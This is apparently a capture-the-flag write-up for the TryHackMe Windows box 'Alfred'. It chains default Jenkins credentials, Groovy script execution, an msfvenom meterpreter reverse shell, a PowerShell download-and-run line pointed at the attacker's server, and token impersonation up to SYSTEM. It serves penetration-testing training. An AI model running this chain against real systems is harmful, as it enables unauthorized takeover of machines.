Alfred
An easy Windows box from TryHackMe, get initial access through Jenkins groovy script, and abusing SeImpersonatePrivelege user rights to get SYSTEM.
Recon
Found a Jenkins instance running on the server, login with default creds
admin:admin
Exploitation
On Jenkins can execute groovy script, leverage that to get a reverse shell on the system
Create a meterpreter reverse shell payload with msfvenom
msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=[IP] LPORT=[PORT] -f exe -o [SHELL NAME].exe
Set up a handler in metasploit with
use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LHOST your-ip set LPORT listening-port run
Set up a python http server, then download the reverse shell to the target using powershell with
powershell "(New-Object System.Net.WebClient).Downloadfile('http://<ip>:8000/shell-name.exe','shell-name.exe')"
Then execute the shell.exe on target to get meterpreter shell
Running
whoami /priv
See that have SeImpersonatePrivelege enabled
Using metasploit, can load the incognito module with
load incognito
Then check which tokens can be impersonated with
list_tokens -g
And see that the BUILTIN\Administrators token is available
Using
impersonate_token "BUILTIN\Administrators"
Command to impersonate the Admin token
Running getuid see that you are NT AUTHORITY\SYSTEM
Now have a higher priveleged token but still need to migrate to a higher priveleged process, the safest process to migrate to is services.exe, migrate the meterpreter shell with
migrate PID_OF_services.exe
And now have full SYSTEM priv